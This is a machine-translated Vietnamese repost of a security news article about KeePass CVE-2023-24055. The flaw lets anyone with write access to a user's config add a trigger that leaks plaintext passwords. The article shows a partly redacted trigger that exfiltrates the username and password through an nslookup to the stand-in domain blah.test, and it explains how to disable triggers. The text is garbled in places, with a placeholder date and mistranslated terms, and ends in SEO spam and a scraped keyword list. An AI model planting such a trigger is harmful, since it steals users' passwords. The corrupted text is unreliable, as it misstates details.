Đó là một vài tuần đáng chú ý đối với các trình quản lý mật khẩu – những tiện ích hữu ích giúp bạn tìm ra một mật khẩu khác cho mỗi trang web bạn sử dụng và sau đó theo dõi tất cả chúng.
Vào cuối năm 2022, đến lượt LastPass trở thành tin tức, khi công ty cuối cùng đã thừa nhận rằng một vi phạm mà họ gặp phải vào tháng 2022 năm XNUMX đã thực sự dẫn đến mật khẩu của khách hàng kho tiền bị đánh cắp từ dịch vụ đám mây nơi chúng được sao lưu.
(Bản thân các mật khẩu không bị đánh cắp, vì các kho tiền đã được mã hóa và LastPass không có bản sao “khóa chính” của bất kỳ ai cho chính các tệp kho tiền dự phòng, nhưng đó là một sự tiết lộ gần hơn so với hầu hết mọi người hài lòng khi nghe.)
Sau đó, đến lượt LifeLock xuất hiện trên khắp các bản tin, khi công ty cảnh báo về thứ trông giống như phát ban của tấn công đoán mật khẩu, có thể dựa trên mật khẩu bị đánh cắp từ một trang web hoàn toàn khác, có thể là cách đây một thời gian và có lẽ được mua trên web tối gần đây.
Bản thân LifeLock không bị xâm phạm, nhưng một số người dùng của nó đã bị xâm phạm nhờ hành vi chia sẻ mật khẩu gây ra bởi những rủi ro mà họ thậm chí có thể không nhớ là đã thực hiện.
Các đối thủ cạnh tranh 1Password và BitWarden gần đây cũng đã xuất hiện trên các bản tin, dựa trên các báo cáo về quảng cáo độc hại, rõ ràng là do Google vô tình phát sóng, đã thuyết phục người dùng sao chép các trang đăng nhập nhằm mục đích lừa đảo thông tin tài khoản của họ.
Giờ đến lượt KeePass Trên bản tin tức, lần này là một vấn đề an ninh mạng khác: một cáo buộc dễ bị tổn thương, thuật ngữ biệt ngữ được sử dụng cho các lỗi phần mềm dẫn đến lỗ hổng an ninh mạng mà kẻ tấn công có thể khai thác cho mục đích xấu.
Đánh hơi mật khẩu được thực hiện dễ dàng
Chúng tôi đang đề cập đến nó như là một dễ bị tổn thương ở đây vì nó có mã định danh lỗi chính thức do Viện Tiêu chuẩn và Công nghệ Quốc gia Hoa Kỳ cấp.
Lỗi đã được đặt tên CVE-2023-24055: Kẻ tấn công có quyền ghi vào tệp cấu hình XML [có thể] lấy được mật khẩu văn bản rõ ràng bằng cách thêm trình kích hoạt xuất.
Thật không may, tuyên bố về việc có thể lấy được mật khẩu văn bản rõ ràng là đúng.
Nếu tôi có quyền ghi vào các tệp cá nhân của bạn, bao gồm cả cái gọi là của bạn %APPDATA%
thư mục, tôi có thể lén lút điều chỉnh phần cấu hình để sửa đổi bất kỳ cài đặt KeePass nào mà bạn đã tùy chỉnh hoặc để thêm các tùy chỉnh nếu bạn không cố ý thay đổi bất kỳ thứ gì…
…và tôi có thể dễ dàng đánh cắp mật khẩu văn bản gốc của bạn một cách đáng ngạc nhiên, ví dụ như hàng loạt, bằng cách kết xuất toàn bộ cơ sở dữ liệu dưới dạng tệp CSV không được mã hóa hoặc khi bạn sử dụng chúng, chẳng hạn như bằng cách đặt “móc chương trình” kích hoạt mỗi khi bạn truy cập vào một mật khẩu từ cơ sở dữ liệu.
Lưu ý rằng tôi không cần Quản trị đặc quyền, bởi vì tôi không cần phải làm phiền với thư mục cài đặt thực tế nơi ứng dụng KeePass được lưu trữ, điều này thường vượt quá giới hạn đối với người dùng thông thường
Và tôi không cần quyền truy cập vào bất kỳ cài đặt cấu hình chung bị khóa nào.
Thật thú vị, KeePass đã cố gắng ngăn mật khẩu của bạn bị đánh cắp khi bạn sử dụng chúng, bao gồm cả việc sử dụng các kỹ thuật chống giả mạo để ngăn chặn các thủ thuật chống keylogger khác nhau ngay cả từ những người dùng đã có quyền quản trị hệ thống.
Tuy nhiên, phần mềm KeePass cũng giúp việc thu thập dữ liệu mật khẩu văn bản gốc dễ dàng một cách đáng ngạc nhiên, có lẽ theo cách mà bạn có thể coi là “quá dễ dàng”, ngay cả đối với những người không phải là quản trị viên.
Mất một phút để sử dụng KeePass GUI để tạo một Cò súng sự kiện chạy mỗi khi bạn sao chép mật khẩu vào khay nhớ tạm và để đặt sự kiện đó thực hiện tra cứu DNS bao gồm cả tên người dùng và mật khẩu văn bản gốc được đề cập:
Sau đó, chúng tôi có thể sao chép cài đặt XML không quá rõ ràng cho tùy chọn đó từ tệp cấu hình cục bộ của chính chúng tôi vào tệp cấu hình của người dùng khác trên hệ thống, sau đó họ cũng sẽ thấy mật khẩu của mình bị rò rỉ qua internet thông qua tra cứu DNS.
Mặc dù dữ liệu cấu hình XML phần lớn có thể đọc được và mang tính thông tin, nhưng KeePass sử dụng một cách kỳ lạ các chuỗi dữ liệu ngẫu nhiên được gọi là GUID (viết tắt của số nhận dạng duy nhất trên toàn cầu) để biểu thị các loại khác nhau Cò súng cài đặt, do đó, ngay cả người dùng có đầy đủ thông tin cũng cần có danh sách tham khảo mở rộng để hiểu được trình kích hoạt nào được đặt và cách đặt.
Đây là giao diện của trình kích hoạt rò rỉ DNS của chúng tôi, mặc dù chúng tôi đã biên tập lại một số chi tiết để bạn không thể mắc phải bất kỳ trò nghịch ngợm nào ngay lập tức chỉ bằng cách sao chép và dán trực tiếp văn bản này:
XXXXXXXXXXXXXXXXXX Sao chép Ăn cắp nội dung thông qua tra cứu DNS XXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test ĐÚNG VẬY 1
Với trình kích hoạt này đang hoạt động, việc truy cập mật khẩu KeePass sẽ khiến văn bản gốc bị rò rỉ trong quá trình tra cứu DNS kín đáo đối với một miền mà tôi chọn, đó là blah.test
trong ví dụ này.
Lưu ý rằng những kẻ tấn công ngoài đời thực gần như chắc chắn sẽ xáo trộn hoặc làm xáo trộn văn bản bị đánh cắp, điều này không chỉ khiến việc phát hiện rò rỉ DNS khó khăn hơn mà còn quan tâm đến mật khẩu chứa các ký tự không phải ASCII, chẳng hạn như các chữ cái có dấu hoặc biểu tượng cảm xúc, mà không thể được sử dụng trong tên DNS:
Nhưng nó thực sự là một lỗi?
Tuy nhiên, câu hỏi hóc búa là, “Đây thực sự là một lỗi hay nó chỉ là một tính năng mạnh mẽ có thể bị lạm dụng bởi một người nào đó vốn đã cần ít nhất nhiều quyền kiểm soát đối với các tệp riêng tư của bạn như chính bạn?”
Nói một cách đơn giản, đó có phải là một lỗ hổng nếu ai đó đã có quyền kiểm soát tài khoản của bạn có thể gây rối với các tệp mà tài khoản của bạn được cho là có thể truy cập được không?
Mặc dù bạn có thể hy vọng rằng trình quản lý pssword sẽ bao gồm nhiều lớp bảo vệ chống giả mạo bổ sung để khiến các lỗi/tính năng thuộc loại này khó bị lạm dụng hơn, nên CVE-2023-24055 thực sự là một lỗ hổng được liệt kê trong CVE?
Nếu vậy, sẽ không lệnh như DEL
(xóa một tập tin) và FORMAT
cũng cần phải là "lỗi"?
Và chẳng phải chính sự tồn tại của PowerShell sẽ khiến hành vi nguy hiểm tiềm ẩn dễ bị kích động hơn nhiều (thử powerhsell get-clipboard
, chẳng hạn), có phải là một lỗ hổng của chính nó không?
Đó là quan điểm của KeePass, được thừa nhận bởi văn bản sau đây đã được thêm vào chi tiết "lỗi" trên trang web của NIST:
** TRANH CHẤP ** […] LƯU Ý: quan điểm của nhà cung cấp là cơ sở dữ liệu mật khẩu không nhằm mục đích bảo mật trước kẻ tấn công có mức truy cập đó vào PC cục bộ.
Phải làm gì?
Nếu bạn là người dùng KeePass độc lập, bạn có thể kiểm tra các Trình kích hoạt giả mạo như “Trình đánh cắp DNS” mà chúng tôi đã tạo ở trên bằng cách mở ứng dụng KeePass và đọc qua CÔNG CỤ > Gây nên… cửa sổ:
Lưu ý rằng bạn có thể biến toàn bộ Cò súng tắt hệ thống khỏi cửa sổ này, đơn giản bằng cách bỏ chọn [ ] Enable trigger system
quyền mua…
…nhưng đó không phải là cài đặt chung nên bạn có thể bật lại cài đặt này thông qua tệp cấu hình cục bộ của mình và do đó chỉ bảo vệ bạn khỏi những sai lầm chứ không phải khỏi kẻ tấn công có quyền truy cập vào tài khoản của bạn.
Bạn có thể buộc tất cả mọi người trên máy tính tắt tùy chọn này mà không có tùy chọn nào để họ tự bật lại tùy chọn đó bằng cách sửa đổi tệp “khóa” chung KeePass.config.enforced.XML
, được tìm thấy trong thư mục cài đặt chương trình ứng dụng.
Trình kích hoạt sẽ bị tắt đối với tất cả mọi người nếu tệp thực thi XML chung của bạn trông giống như sau:
SAI
(Trong trường hợp bạn đang thắc mắc, kẻ tấn công có quyền ghi vào thư mục ứng dụng để đảo ngược thay đổi này gần như chắc chắn sẽ có đủ quyền lực ở cấp hệ thống để tự sửa đổi tệp thực thi KeePass hoặc để cài đặt và kích hoạt một keylogger độc lập.)
Nếu bạn là quản trị viên mạng được giao nhiệm vụ khóa KeePass trên máy tính của người dùng để nó vẫn đủ linh hoạt để giúp họ, nhưng không đủ linh hoạt để họ vô tình giúp đỡ tội phạm mạng, chúng tôi khuyên bạn nên đọc qua KeePass Vân đê bảo mật trang, Triggers trang và Cấu hình thực thi .
- Phân phối nội dung và PR được hỗ trợ bởi SEO. Được khuếch đại ngay hôm nay.
- Platoblockchain. Web3 Metaverse Intelligence. Khuếch đại kiến thức. Truy cập Tại đây.
- nguồn: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Có khả năng
- Giới thiệu
- ở trên
- Tuyệt đối
- truy cập
- truy cập
- Tài khoản
- hoạt động
- thêm
- thừa nhận
- quảng cáo
- Sau
- chống lại
- Tất cả
- cáo buộc
- Đã
- và
- Một
- ứng dụng
- Các Ứng Dụng
- Tháng Tám
- tác giả
- tự động
- trở lại
- được hậu thuẫn
- background-image
- sao lưu
- dựa
- bởi vì
- được
- biên giới
- đáy
- vi phạm
- Bug
- lỗi
- nắm bắt
- mà
- trường hợp
- gây ra
- nguyên nhân
- Trung tâm
- chắc chắn
- thay đổi
- nhân vật
- kiểm tra
- sự lựa chọn
- xin
- gần gũi hơn
- đám mây
- màu sắc
- Đến
- công ty
- hoàn toàn
- máy tính
- máy tính
- điều kiện
- Cấu hình
- Hãy xem xét
- điều khiển
- bản sao
- có thể
- che
- tạo
- tạo ra
- cve
- tội phạm mạng
- An ninh mạng
- Nguy hiểm
- tối
- Web tối
- dữ liệu
- Cơ sở dữ liệu
- chi tiết
- ĐÃ LÀM
- khác nhau
- trực tiếp
- Giao diện
- dns
- miền
- dont
- xuống
- được mệnh danh là
- dễ dàng hơn
- dễ dàng
- hay
- mã hóa
- thực thi
- đủ
- Toàn bộ
- Ngay cả
- Sự kiện
- Mỗi
- mọi người
- ví dụ
- Khai thác
- xuất khẩu
- mở rộng
- thêm
- Đặc tính
- vài
- Tập tin
- Các tập tin
- Cuối cùng
- Tìm kiếm
- linh hoạt
- tiếp theo
- Buộc
- tìm thấy
- từ
- được
- nhận được
- Toàn cầu
- Đi
- tiện dụng
- vui mừng
- có
- cao
- giúp đỡ
- tại đây
- Holes
- mong
- di chuột
- Độ đáng tin của
- Tuy nhiên
- HTML
- HTTPS
- định danh
- lập tức
- in
- bao gồm
- bao gồm
- Bao gồm
- thông tin
- cài đặt, dựng lên
- ví dụ
- Viện
- Internet
- vấn đề
- Ban hành
- IT
- chính nó
- biệt ngữ
- Giữ
- nổi tiếng
- phần lớn
- LastPass
- lớp
- dẫn
- bị rò rỉ
- Rò rỉ
- Cấp
- Danh sách
- địa phương
- nhìn
- NHÌN
- tra cứu
- thực hiện
- làm cho
- LÀM CHO
- giám đốc
- Quản lý
- Lợi nhuận
- max-width
- Might
- sai lầm
- sai lầm
- sửa đổi
- hầu hết
- tên
- quốc dân
- Cần
- mạng
- tin tức
- nắm tay
- bình thường
- được
- chính thức
- mở
- Tùy chọn
- nếu không thì
- riêng
- tham số
- Mật khẩu
- Mật khẩu
- paul
- PC
- người
- có lẽ
- riêng
- Lừa đảo
- Văn bản thô
- plato
- Thông tin dữ liệu Plato
- PlatoDữ liệu
- vị trí
- bài viết
- có khả năng
- quyền lực
- mạnh mẽ
- quyền hạn
- PowerShell
- riêng
- đặc quyền
- có lẽ
- chương trình
- đã mua
- mục đích
- đặt
- câu hỏi
- ngẫu nhiên
- phát ban
- Reading
- gần đây
- giới thiệu
- đều đặn
- nhớ
- trả lời
- Báo cáo
- Báo cáo
- đảo ngược
- rủi ro
- chạy
- Phần
- an toàn
- ý nghĩa
- dịch vụ
- định
- thiết lập
- thiết lập
- ngắn
- nên
- đơn giản
- So
- Phần mềm
- rắn
- một số
- Một người nào đó
- Spot
- độc lập
- tiêu chuẩn
- Vẫn còn
- ăn cắp
- Dừng
- lưu trữ
- như vậy
- phải
- SVG
- hệ thống
- Hãy
- kỹ thuật
- Công nghệ
- Sản phẩm
- cung cấp their dịch
- tự
- vì thế
- Thông qua
- thời gian
- đến
- quá
- hàng đầu
- theo dõi
- quá trình chuyển đổi
- minh bạch
- kích hoạt
- đúng
- XOAY
- Quay
- thường
- độc đáo
- URL
- us
- sử dụng
- người sử dang
- Người sử dụng
- tiện ích
- khác nhau
- Vault
- kho tiền
- thông qua
- dễ bị tổn thương
- W3
- cách
- web
- Website
- tuần
- Điều gì
- cái nào
- CHÚNG TÔI LÀ
- sẽ
- tự hỏi
- Công việc
- sẽ
- viết
- XML
- trên màn hình
- mình
- zephyrnet